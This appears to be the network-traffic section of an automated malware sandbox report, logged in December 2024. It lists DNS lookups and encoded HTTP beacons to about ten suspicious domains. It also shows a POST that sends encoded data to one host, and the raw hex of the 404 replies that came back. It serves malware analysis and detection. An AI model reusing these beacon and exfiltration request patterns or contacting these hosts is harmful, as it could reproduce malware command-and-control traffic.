                Source: global trafficHTTP traffic detected: GET /lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.canadavinreport.siteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.yunlekeji.topUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.logidant.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.tals.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLO HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.brightvision.websiteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.izmirescortg.xyz
                Source: global trafficDNS traffic detected: DNS query: www.aballanet.cat
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                Source: global trafficDNS traffic detected: DNS query: www.yunlekeji.top
                Source: global trafficDNS traffic detected: DNS query: www.logidant.xyz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.brightvision.website
                Source: unknownHTTP traffic detected: POST /6xrr/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 201Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.aballanet.catOrigin: http://www.aballanet.catReferer: http://www.aballanet.cat/6xrr/User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 43 58 30 62 58 4b 50 4f 51 69 4f 76 45 2f 2b 63 7a 65 52 43 44 6b 78 67 45 41 73 51 41 36 75 68 41 3d 3d Data Ascii: rfJh=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4CX0bXKPOQiOvE/+czeRCDkxgEAsQA6uhA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:54:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg9CNp9BliKKfIzIleuGRo2sgboe1DjNSITzUh%2BvaLmdbEwkg6NlbPctPgy1vZ8G09NQKQ6E2%2F%2B%2B7qkfrAxKu4YK74mchpcIUWlwP6dOCjjiUqM8XdEo2YHCqwr2Kl3xTksM0Jh3cw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec14ce66f67431a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2685&min_rtt=2685&rtt_var=1342&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:54:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:54:31 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 39 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 